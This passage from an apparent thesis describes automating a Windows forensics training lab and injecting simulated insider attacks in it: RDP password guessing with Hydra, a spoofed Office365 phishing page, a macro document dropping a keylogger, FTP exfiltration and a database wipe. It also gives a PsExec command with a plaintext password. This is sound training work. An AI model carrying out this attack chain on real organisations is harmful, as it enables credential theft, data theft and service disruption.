Before the installation of Exchange, various Windows components need to be installed. I have tested the deployment script with the Exchange 2016, and all the required prerequisites for this version are listed on the official Microsoft page[17]. Majority of them are Windows Features that could be installed from the command line. However, there is also one additional binary file that needs to be downloaded and installed - Microsoft Unified Communications Managed API 4.0 (UCMA)[18]. The installation process of all required prerequisites and Exchange Mailbox is automated by the script Start-NewExchangeServer.

31 4. Building the environment

Configuration data file is called NewExchangeServerConfigData.psd1. Similar to SQL Server configuration, there are no parameterizable pa- rameters in the ScenarioData section. Besides the information about target server in NodeData section we need to provide:

∙ URL links to Exchange installation file.

∙ URL links to UCMA executable file.

∙ Product ID for UCMA.

Mentioned files should be stored on our Apache server in advance.

Configuration script The configuration script NewExchangeServer.psd is designed to per- form the following actions on a target server:

1. Install required Windows-Features listed in the prerequisites.

2. Download and install UCMA.

3. Copy Exchange files locally on disk.

4. Do the Exchange installation.

4.6 Windows Workstations

We need to have the following software on our workstations:

∙ Chrome Web Browser

∙ Microsoft Outlook 2016

∙ Microsoft Word 2016

Unfortunately, Microsoft Office 2016 could not be installed using DSC due to license restrictions. The enterprise deployment process is com- plicated and cannot be easily atomized [19]. So for the Office applica- tions, we need to get Office 365 Personal and install individual Office applications on our workstations manually.

32 4. Building the environment

For the installation of Chrome I have used MSFT_xChrome DSC Resource. It simplifies the installation process of this web browser. We just need to specify the language of the browser, the module than download the latest version of the browser from the official Google page and install it.

Configuration data Configuration data file is called NewWorkStationConfigData.psd1. In the AllNodes section, we can specify all nodes where we want to install the software. Because in the demonstration scenario we have three workstations involved we will install the required software simultane- ously on all these computers. In the ScenarioData we need to specify the language of the browser to be installed.

Configuration script The configuration script name is NewWorkStation.ps1 and it just use the MSFT_xChrome DSC Resource to install Google Chrome Web Browser.

33

5 Populating environment with the scenario data

In this chapter, we will introduce the process of populating our envi- ronment with the data. This will make our training environment look more realistic. Firstly we will add users to our domain. Then we will deploy a web application and fill the database server with application data. Then with Python scripts, we will simulate the users’ behavior in the systems.

5.1 Adding users, groups, and organizational units

Companies have a hierarchical structure within their domains and users are divided into groups and organizational units (OU). Placing users in such a hierarchy allows effectively assign permissions and delegate rights inside the organization. Clearing the distinction be- tween groups and OUs is important. Groups are designed to grant or restrict access to company resources, and organizational units are intended to control objects (using group policy settings). OU is useful when we want to delegate admin tasks to specific users, for example, ability to reset passwords for other employees. [4] In our demonstration scenario, AD groups and organizational units are mirror company hierarchy as shown in Figure 5.1. The process of adding users and their division into groups and or- ganizational units is automated by the Start-NewDomainController\ -Installation.ps1. Adding users and are automated by the Start-AddGroupsAndUsers. ps1 script. The script should be run directly on a domain controller.

Configuration data Configuration data file is called AddGroupsAndUsersConfigData.psd1. The following parameters could be parameterized in the ScenarioData section:

∙ DomainName - name of the domain to which the user will be added.

35 5. Populating environment with the scenario data

Figure 5.1: Organizational units and groups structure.

∙ AdGroups - list of groups that will be created. ∙ OrganizationalUnits - list of organizational units that will be created. ∙ AdUsers - array of user objects (hashtables) that will be created in the domain. Each user has the following parameters:

– FirstName - first name of the user, that will be added. – LastName - last name of the user, that will be added. – Department - organizational unit to which user belongs. – Group - array of user objects (hashtables) that will be cre- ated in the domain. – Title - job title of the user. This parameter is not mandatory. – Password - password for the account.

36 5. Populating environment with the scenario data

Please be aware that usernames must be unique throughout each domain. The username will be created as a concatenation of the first name and last name.

Configuration script Configuration script is called AddGroupsAndUsers.psd1. The config- uration script uses xActiveDirectory DSC module and perform the following actions on a target server: 1. Create the Organizational Units. For this purpose, script is using xADOrganizationalUnit function.

2. Create users and divide them into organizational units. This is made by xADUser function.

3. Create groups and add users to this groups.

5.2 Deploying web application

Now when Internet Information Service and Miscrosoft SQL Server are running, we can proceed with the deploying of the web application. The web application deployment process is automated by the Start-DeployWebSite.ps1 script. In the configuration data, we need to provide URL to the website package and website name.

Configuration data Configuration data file is called DeployWebSiteConfigData.psd1. Be- sides the target server name, we need to provide URL to the website package and website name. 1. WebSitePackage - URL to the Website files in ZIP archive.

2. WebSiteName - website name that is easily recognized.

Configuration script The configuration script is called DeployWebSite.ps1 and will perform the following actions on a target server:

37 5. Populating environment with the scenario data

1. Stop the default website (wwwroot). 2. Create Website home directory in the default Inetpub folder. 3. Extract Website files to the newly created website home directory. 4. Create new Website and set the path to the Website files. 5. Start the Website.

Demonstration scenario WebSite Of course, creating a new ASP.NET application with database and users from scratch would be time-consuming. Therefore the best solu- tion is to use an existing web application that is popular in the business segment. For the purposes of thesis I used nopCommerce1. nopCommerce is the leading ASP.NET based open-source eCom- merce platform, and it ideally fits our needs. Since it is based on ASP.NET, it is running on IIS server and uses MS SQL Server backend database. It is available under the GNU General Public License V3 and based on it a lot of famous webstores have been designed. The installation process is simple and consist of two steps. The first step is done by our automation and the second should be performed manually, directly in the nopCommerce application wizard. 1. Website deployment We will use nopCommerce version 3.80, it is available on GitHub [20]. We need to save the website content in ZIP archive to our Apache shared storage. Code 5.1 shows an example of ScenarioData section in configuration data file. Listing 5.1: Scenario data section for nopCommerce website de- ployment. ScenarioData=@{ WebSitePackage="http ,→ ://147.251.253.164/ ,→ nopCommerce_3.80_NoSource.zip" WebSiteName="ecommerce" }

1. https://www.nopcommerce.com

38 5. Populating environment with the scenario data

When the DSC configuration process is finished we have running nopCommerce web application.

2. Website configuration When we open a browser and go to IP address of our IIS server we will be redirected to the installation page (Figure 5.2).

Figure 5.2: nopCommerce Installation page.

In the Store information area we need to define:

∙ Admin user email ∙ Admin user password

We will check the the Create sample data check-box. It will create sample data in our MS SQL database. In the Database information area we need to define information about our MS SQL Server:

39 5. Populating environment with the scenario data

∙ SQL Server name ∙ Database name

When the setup process is complete, our new site’s home page is displayed, and our database is filled with a sample data. Those installation steps are describe in more detail in nopCom- merce guide [21].

5.3 Simulation of users actions

Challenges Simulation of users activity in the systems is not trivial. It is not enough just to perform a certain task, but we need to do it in a way that a normal user does. Only this approach will generate truly forensic traces. As an example, let’s show the case with reading emails. The easiest way is to connect with Python script to our Exchange email box and mark all messages as read; however, it is not the way how the user will do it. The user will firstly open the Outlook application and then will read emails one by one.

Developed solution To automate the user’s activities (victim’s as well as attacker’s), I will use Python library that is called pywinauto[22]. It is a set of Python modules that allow automates GUI. It allows sending mouse and keyboard actions to windows dialogs and controls and controls. With the usage of this library, I have created own python package called forensic_bot, that contains functions to simulate a particular user’s activities that we will need reproduce in our environment. The package contains more than 9 functions to simulate user’s activities. Example of activities which are automated with function:

∙ Browse particular web pages through Chrome Web browser.

∙ Send a random email to the list of recipients. To generate random content of the emails loremipsum python package is used.

40 5. Populating environment with the scenario data

∙ Search suspicious queries with Google and show the most rel- evant result. Typical activity of script kiddies when they are looking for the information related to an attack (e.g. "script for dropping MS SQL database")

This approach with the created package and functions has multiple benefits. We can simply import this package from another Python script and call the functions. Because each function is one particular action we can use this functions in a loop or we can build a chain of such actions.

Run Python Scripts Remotely Of course, we can login to the particular computer and run Python script directly, but a better solution is to execute all script for all users from the same node (Domain Controller). This can be done with a tool PSExec2. It is a tool for remotely executing processes on Windows. Code 5.2 shows an example of the command, that executes a script that is saved on shared network storage on a JLumen-PC computer. Listing 5.2: Remote execution of shell python. PsExec64.exe\\JLumen-PC-i1-uSTARKINDUSTRIES ,→ \Administrator-p Password"C:\Python34\ ,→ python.exe""\\SharedFolder\ ,→ place-malware-on-share.py"

2. https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

41

6 Security incidents injection

Now when we have working environment filled with the users and data, our goal is to inject attacks. Combination of environment and security incidents establish a compromised infrastructure to study. The attacks will produce predefined forensics evidence to be used in the training modules. This chapter will show the process of compromising the target and present cyber attacks that will be performed by our insider attacker. We will also introduce the scripts that have been created to automate this process and will generate forensics artifacts. These forensics arti- facts will be analyzed by the participants of our training during the investigation. The order of the scenario attacks is shown in Figure 6.1. As it was mentioned in Chapter 2.2 our insider attacker (Jim Lumen) chose two target persons from the employees:

∙ John Smith (CEO) - the person from the executive department, has access to confidential information available only to senior management.

∙ Travis Doe (IT System Administrator) - also the valuable target of opportunities, have administrator privileges to the corporation services.

Our attacker is motivated by money and wants to get revenge on an old employer. To stay anonymous and not to use his work computer for attacks he built a remote server in the cloud. He performed three attacks in total:

1. Password guessing attack. This one was unsuccessful. (Number 1 in the Figure 6.1)

2. Phishing attack (Numbers 2, 3 in Figure 6.1)

3. Malware attack (Numbers 4, 5, 6, 7, 8, 9 in Figure 6.1)

After the attacker gain needed accesses in the network, they performed two post-exploitation actions: service disruption and data theft.

43 6. Security incidents injection

Figure 6.1: Attacks implemented in our sample Scenario.

To describe the attacks I mapped our attacks to “intrusion kill chain”[23] model. This is one of the most popular models that is used to describe attackers actions during attempting to compromise an orga- nization’s information system. This model has been firstly introduced

44 6. Security incidents injection

in a paper by Lockheed Martin Corporation. The model introduces seven phases of the attack: 1. Reconnaissance - research, identification and selection of tar- gets. 2. Weaponization - create a delivery payload. 3. Delivery - deliver the weapon to the target environment. 4. Exploitation - exploit the target (could be the system or user). 5. Installation - installation of a backdoor to maintain persistence. 6. Command and Control (C2) - establish a channel for the attacker to control the system. 7. Actions on objective - the attacker can achieve his original goals.

6.1 Password guessing

Password guessing attacks on RDP is a very primitive but sometimes very effective type of attack. The attacker tries to gain remote accessto the server simply by automatically attempting to login over and over with different variations of login names and passwords. In our scenario, the attacker (insider) will try to gain remote access to the company’s database server.

Reconnaissance In this stage, the attacker needs to find the IP address of SQL server. This could be done simply by using one of the many network scanning tools.

Weaponization The the attacker need to write a script or use a tool that will perform the password guessing. Such tools are designed to attempt hundreds of password each second. We will use a popular tool for cracking remote authentication services called Hydra1.

1. https://www.thc.org/thc-hydra/

45 6. Security incidents injection

Delivery Now the attacker is ready to run the tool from their remote server. To automate this attack Bash script run-rdp-password-guessing.sh was created. The script has only one input parameter - the IP address of target server. It performs the following actions: ∙ Install Hydra. ∙ Run password guessing attack targeted on RDP and Adminis- trator account. A basic set of passwords is tried. The script is designed to be executed on the attacker’s remote server. In our case, the password guessing attack was unsuccessful and did not reveal to attacker any information. This is the last stage of the kill chain; the attack was prevented by using a strong password.

Generated forensics artifacts ∙ Event logs - EventID 4776 (Computer attempted to validate the credentials to an account)

6.2 Phishing email

Phishing is a form of social engineering. This type of attacks relies on the human weakness like gullibility, naivety or ignorance. When a human being tends to ignore security policies and companies, do not invest in security awareness training this types of attacks are very effective. They are also very popular among hackers because they allow obtaining the desired information with little effort. They do not need to understand technologies in depth and develop a sophisticated malware; they just need to make a call or send an email. Phishing uses an email that looks legitimate and leads a user to click on a link or visit a certain website. The link can lead either to malware or to a website that collects victims credentials. [24] In our scenario we will use a phishing web page that mimics the Office3652 sign-in screen, looking just like the one victim is accustomed

2. https://www.office.com/

46 6. Security incidents injection

to seeing when using online versions of Microsoft office tools. Cre- dentials to Office365 are very sensitive information because in most cases they correspond to user’s domain account credentials. Then the attacker could also use those credentials to log into any company website that faces the Internet and get access for example to user’s sensitive files.

Reconnaissance

In this phase, the attacker needs to identify the email address of the recipient. In our organisation, the email addresses have the following format: [email protected]. Since our insider work in the same company as target person, the email addresses are known within the company, and it is not a problem to identify the email address of the target employee.

Weaponization

In this step, we need to set up a malicious website that mimics some original site and stole login credentials. As it was previously men- tioned, we are going to spoof Office365 login page. To automate this step the following script has been created: deploy-phishing-website.sh This is a Bash script that has been created to automate the installa- tion process of Apache and the following deployment of the phish- ing website. The script takes one ZIP archive with website data as a command-line argument. The ZIP archive should contain index.html file. The script is designed to be executed directly on attacker’s remote server. For a fraudulent Office365 web page I decided to use a template available on GitHub[25]. I have made only a slight change in the login- submit.php file to add functionality which allows saving the provided credentials on a server (/tmp/credentials.txt) and than redirect the vic- tim to the official Microsoft web page.

47 6. Security incidents injection

Delivery After we set up our malicious website, we can proceed with sending the phishing email. We will use the Google SMTP Server to send our phishing email; therefore a Gmail account is required. Script (send-phishing-email.py) to send phishing email uses a func- tion from our Python Package and takes five input parameters:

∙ gmail_user - Gmail sender email address.

∙ gmail_password - Gmail sender password.

∙ recipient - Recipient email address.

∙ victim_lastname - Victim’s last name. Personalization will make phishing email more trustworthy.

∙ phishing_link - Link to the phishing website that spoofed the original site and stole login credentials.

Exploitation and Installation The user receives our email, clicks on the phishing site (Exploitation) and loads it in their browser. The user sees the familiar login page and provides their login name and password (Installation). These user’s actions are automated with open-phishing-email.py script. It takes three input parameters:

∙ subject - Subject of the phishing email.

∙ username - User’s Office365 login name.

∙ user_password - User’s Office365 password.

The script uses Outlook keyboard shortcuts for the actions like “Go to the Search box“ and “Open a received message“. It is designed for Outlook 2016 and Outlook 2013 and acts in the following way:

1. Open the Outlook application.

2. Search for the email with the provided subject.

48 6. Security incidents injection

3. Open the email and click on the phishing link.

4. Type the login name and password and press Enter.

5. Close all programs (return to the initial state).

Command and Control

Transport of the stolen credentials to the attacker. This is done by our phishing website. The credentials can be found on attacker server within /tmp/credentials.txt file.

Actions on Objectives

As an attacker, we have compromised the credentials of a person from high management and can proceed with lateral movements in the network. Now we have access to the network share. We can continue with placing the malware and confidential data stealing.

Generated forensics artifacts

∙ Records in Exchange logs (retrieving emails).

∙ Users mailboxes (phishing email with link).

∙ Web browser history.

6.3 Malware injection

There are a lot of different types of malicious software. In our scenario, we will use a malicious Office document. Attackers commonly use this type of malware against organizations. Because IT System Administra- tors are not naive computer users and they think twice before opening a Word document, our attacker will place the file on the corporation network share to make it look legitimate.

49 6. Security incidents injection

Reconnaissance Because the attacker wants to send a spoofed email from the CEO account to the IT administrator, they will need to find out the recipient email address in this phase. As it was already mentioned during the phishing stage email address are publicly known within the company.

Weaponization In this step, the attacker needs to create the malicious Office docu- ment. The attacker hides a malicious macro inside the Microsoft Office document. The macro will download a keylogger from the Apache server (the same as was used for phishing attack) and execute it. The keylogger will upload the intercepted data to the FTP server. To place the malwares on the attacker’s server and configure FTP server a Bash script has been created. The script deploy-ftp-and-place-malwares.sh takes file names as pa- rameters, and as output, it returns absolute URL path to each file. The script is designed to be executed directly on attacker’s remote server.

Delivery Now the attacker needs to connect to a network share using stolen CEO credentials and place the malicious document there. After that, they will send a spoofed email pretending to be from the CEO and inform IT, administrator, that a new document is available on the file share. Placing the malware on the network share is automated with place-malware-on-share.py script. It takes three input parameters:

∙ username - The username that will be used to connect to a net- work drive.

∙ password - The password that will be used to connect to a network drive.

∙ file_path - The network path where file should be placed.

∙ malware_path - Absolute URL path to the malicious document that will be downloaded and copied to the network drive.

50 6. Security incidents injection

The script is designed to be executed from the attacker’s workstation, located in the domain.

Exploitation and Installation The victim (IT administrator) receives the email and goes to share to open the document. At this moment macro is executed, and the keylogger is installed and started on the victim’s computer. The victim did not notice any malicious activity and continued to perform daily tasks. At some moment he uses Remote Desktop Connection to login to the SQL Server. His credentials have been compromised and sent to the attacker’s remote server. Those user’s actions are automated with the run-malware.py script. The script takes three input parameters:

∙ malware_path - The absolute path to the malware on the network drive.

∙ rdp_username - The username that will be used to connect to a remote server.

∙ rdp_password - The password that will be used to connect to a remote server.

The script performs the following tasks:

∙ Open the provided location in file explorer.

∙ Run the Malware.

∙ Wait for some time and use Remote Desktop Client.

∙ Close all programs (return to the initial state).

The script is designed to be executed from victim’s (IT Administra- tor) computer.

Command and Control The keylogger is running in the background and sends each keystroke to the attacker’s remote server.

51 6. Security incidents injection

Actions on Objective Now the attacker can perform further lateral movements in the net- work. He will use the credentials to drop the database and cause disruption of company information services.

Generated forensics artifacts ∙ Prefetch files - tracking of programs execution (Word, Keylogger). Windows 10 saves previous seven times of program execution history in Prefetch files.

∙ Processes running in RAM memory (Keylogger).

∙ Malicious binaries on the file system.

∙ Active network connections.

6.4 Theft of sensitive information

Now when the attacker gains access to all required network services he continues to fulfill their aims. They can proceed with data stealing. The attacker will connect to the shared folder and copy the data to their computer. To ex-filtrate, the data insiders are often using file transfer and tunneling protocols, such as FTP and SCP (25% According to McAfee report[3]) we will also include this fact in our scenario. From their computer using FTP, they will send the data to their server that is located outside the company network. To automate this actions on the attacker’s computer, the script steal-file-from-share.py has been created. The script takes the following input parameters:

∙ username - The username that will be used to connect to a net- work drive.

∙ password - The password that will be used to connect to a network drive.

∙ file_path - The network path to file that should be stolen.

52 6. Security incidents injection

The script performs the following tasks:

1. Map Network Drive - connect using stolen credentials.

2. Copy confidential file to the disk.

3. Open file in Word application (attacker ensures that the docu- ment is correct).

4. Send file with FTP to an external server.

5. Delete the file from the disk.

6. Close all programs (return to the initial state).

Generated forensics artifacts ∙ LNK files - generated while attacker opens a document (non- executable file via explorer.exe).

∙ Record in the registry hive file NTUSER.DAT in the user’s profile directory (NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion \Explorer\RecentDocs) about last opened .doc file and when it was opened.

∙ Recycle bin (INFO2) files - information about deleted document. Proofs that confidential file has been present on the attacker’s computer.

6.5 Disruption of company’s information services

Another attacker’s aim is to drop the Eshop database and disrupt company’s business operations. To perform this actions and gener- ate related forensics artifact a script database-disruption.py has been created. The script takes the following input parameters:

∙ username - The username that will be used to connect to SQL server.

53 6. Security incidents injection

∙ password - The password that will be used to connect to SQL server.

∙ server_name - The computer name of the SQL server.

1. Open a Web browser and search for the command to erase SQL database.

2. Connect to SQL server and trigger the commands.

3. Close all programs (return to the initial state).

Before running this actions, we will trigger the creation of a Volume Shadow Copy on the SQL server. This will generate additional forensic artifact and will demonstrate who the data could be restored if the shadow copy is presented on the disk.

54 7 Conclusion

The aim of this thesis was to design processes and tools to create a simulated environment that will be used for digital forensics trainings. Firstly I have done the research to pick three orchestration technolo- gies that support MS Windows. I tested them and chose one that best suits the requirements of the training. I familiarized myself with this technology and designed the configuration data structure and deploy- ment process. The data in configuration scripts are clearly structured and logically separated. The created scripts allow to deploy the envi- ronment repeatedly with minimum human interaction, and they are reasonably parametrizable. The deployment scripts have been created for each basic type of Windows Servers that could be met in the Enterprise IT Infrastructure. The testing and debugging of these scripts were not easy because installation of Windows services takes a non-trivial amount of time. As an example, the installation of the SQL Database Server with all required features could take up to 3 hours. When I had a working environment that could be easily, and re- peatability deployed I proceed with populating it with a data to make it look realistic. The process of filling the environment with a data is also automated.I have created the scripts to deploy the web applica- tion, fill the database with a sample data, add users to the domain. One of the most challenging things was to simulate the daily users’ activity. It is not enough just to do a particular task in the system, but the scripts should simulate the real user behavior to generate truly forensics footprints. During my work on this thesis, I have attended various forensics trainings to understand the important forensic areas on Windows Systems. Based on this knowledge I designed and implemented attacks in the environment that generates such evidence. The behavior of attacker in the systems is also automated. The environment built with the created scripts can be used for the trainings aimed at basics of Windows forensics. I provided an example of the scenario that could be used during the training in KYPO. On most forensics trainings the participants work with a copy of the original evidence. At the beginning of the exercise, they are

55 7. Conclusion provided with all required information. My training is unique because participants are provided with a live system, and they need to collect their evidence firstly. This approach will give them a lesson that ifthey will do something wrong they can irreversibility lost their evidence. Such unique approach and the tools that allow realizing it is the main contribution of this thesis. It is important to notice that I was not able to automate all the installation steps and users activities. In most cases, it was impossible due to limitations of Windows environment. Therefore the deployment process still needs to be operated by an organizer and some manual work will be required. In the end, I would like to remind a famous forensic statement: ”Every contact leaves a trace.” We can try to simulate users behavior in the system however there always be evidence that some additional script was running. This is a reason why the environment prepared in such way is suitable only for on-site training when the learning process is divided into blocks, and the instructor is available for questions.

56 Bibliography

1. EC-COUNCIL. Computer Forensics: Investigation Procedures and Response (EC-Council Press). Course Technology, 2009. ISBN 978-1-435-48349- 1. 2. ČELEDA, Pavel; ČEGAN, Jakub; VYKOPAL, Jan; TOVARŇÁK, Daniel. M and S Support to Operational Tasks Including War Gaming, Logis- tics, Cyber Defence. KYPO – A Platform for Cyber Defence Exer- cises [online]. Munich (Germany): NATO Science and Technology Organization, 2015. ISBN 978-92-837-2020-1. Available also from: https://is.muni.cz/repo/1319597/2015-NATO-MSG-133-kypo- platform-cyber-defence-exercises-paper.pdf. 3. Grand Theft Data: Data exfiltration study: Actors, tactics, and detection [on- line]. McAfee [visited on 2018-05-19]. Available from: https://www. mcafee . com / us / resources / reports / rp - data - exfiltration . pdf. 4. DESMOND, Brian.; RICHARDS, Joe. Active Directory. Fifth edition. Sebastopol: O’Reilly Media, [2013]. ISBN 978-1-449-32002-7. 5. ELFASSY, David. Mastering exchange server 2013. 1st edition. Indianapo- lis, IN: John Wiley and Sons, 2013. ISBN 978-1-118-55683-2. 6. SCHAEFER, Kenneth; COCHRAN, Jeff; FORSYTH, Scott; GLENDEN- NING, Dennis; PERKINS, Benjamin. Professional Microsoft IIS 8. Wrox, 2012. ISBN 978-1-118-38804-4. 7. PETKOVIĆ, Dusan. Microsoft SQL Server 2008: A Beginner’s Guide. McGraw- Hill Education, 2008. ISBN 978-0-071-54638-6. 8. LUTTGENS, Jason T.; PEPE, Matthew; MANDIA, Kevin. Incident Re- sponse & Computer Forensics, Third Edition. McGraw-Hill Education, 2014. ISBN 978-0-071-79868-6. 9. Puppet documentation [online]. Puppet [visited on 2018-05-07]. Avail- able from: https://puppet.com/docs/pe/2018.1/managing_ windows_nodes/windows_module_pack.html. 10. Puppet documentation [online]. Puppet [visited on 2018-05-07]. Avail- able from: https://puppet.com/docs/puppet/5.5/architecture. html%5C#the-stand-alone-architecture.

57 BIBLIOGRAPHY

11. MADHURRANJAN, Mohaan; RAITHATHA, Ramesh. Learning Ansi- ble : use Ansible to configure your systems, deploy software, and orches- trate advanced IT tasks. Birmingham, UK: Packt Publishing, 2014. ISBN 978-1-78355-063-0. 12. Ansible Documentation [online]. Ansible [visited on 2018-05-08]. Avail- able from: http://docs.ansible.com/ansible/latest/modules/ list_of_windows_modules.html. 13. JONES, Don; JANUSZKO, Melissa. The DSC Book. Leanpub, 2017. Available also from: https://leanpub.com/the-dsc-book. 14. Separating configuration and environment data [online]. Microsoft, 2017 [visited on 2018-05-06]. Available from: https://docs.microsoft. com/en-us/powershell/dsc/separatingenvdata. 15. SQL Server Management Studio (SSMS) [online]. Microsoft [visited on 2018-05-02]. Available from: https://docs.microsoft.com/en- us/sql/ssms/download-sql-server-management-studio-ssms? view=sql-server-2017. 16. Getting IDs to use with the Package DSC resource [online]. Microsoft [visited on 2018-05-21]. Available from: https : / / blogs . msdn . microsoft . com / brian _ farnhill / 2017 / 07 / 04 / getting - ids - to-use-with-the-package-dsc-resource/. 17. Exchange 2016 prerequisites [online]. Microsoft Technet [visited on 2018-05-20]. Available from: https://technet.microsoft.com/en-us/library/ bb691354(v=exchg.160).aspx. 18. What is UCMA 4.0 [online]. Office Dev Center [visited on 2018-05-20]. Available from: https://msdn.microsoft.com/en-us/library/ office/dn465943.aspx. 19. Plan your enterprise deployment of Office 365 ProPlus [online]. Microsoft [visited on 2018-05-20]. Available from: https://docs.microsoft. com/en-us/deployoffice/plan-office-365-proplus. 20. MAZ, Andrei. nopCommerce - release-3.80 [online]. GitHub, 2016 [vis- ited on 2018-05-02]. Available from: https://github.com/nopSolutions/ nopCommerce/releases/download/release-3.80/nopCommerce_3. 80_NoSource.rar.

58 BIBLIOGRAPHY

21. NopCommerce documentation [online]. NopCommerce [visited on 2018-05-05]. Available from: http : / / docs . nopcommerce . com / display / en / Installation+guide. 22. Pywinauto Documentation [online]. Pywinauto [visited on 2018-05-21]. Available from: http://pywinauto.readthedocs.io/en/latest/ index.html. 23. M HUTCHINS, Eric; J CLOPPERT, Michael; M AMIN, Rohan. Intelligence- Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains. Lockheed Martin Corporation, 2011. Available also from: https://www.lockheedmartin.com/ content / dam / lockheed - martin / rms / documents / cyber / LM - White-Paper-Intel-Driven-Defense.pdf. 24. BLOCKMON, Raymond. CEH V9: Certified Ethical Hacker Version 9 Practice Tests. 1st. Alameda, CA, USA: SYBEX Inc., 2016. ISBN 978- 1-119-25215-3. 25. PENTESTGEEK. Phishing Frenzy Templates [online]. GitHub [visited on 2018-05-14]. Available from: https://github.com/pentestgeek/ phishing-frenzy-templates/tree/master/office365.

59

A Attachments

Electronic attachment is compressed in the thesis-archive.zip file, which contains created scripts for building training environment aimed at digital forensics with minimum human interaction. The electronic attachment is the snapshot of the main development repos- itory. If you are looking for the newest version, it is available here: https://github.com/ICS-MU/stark-forensics

61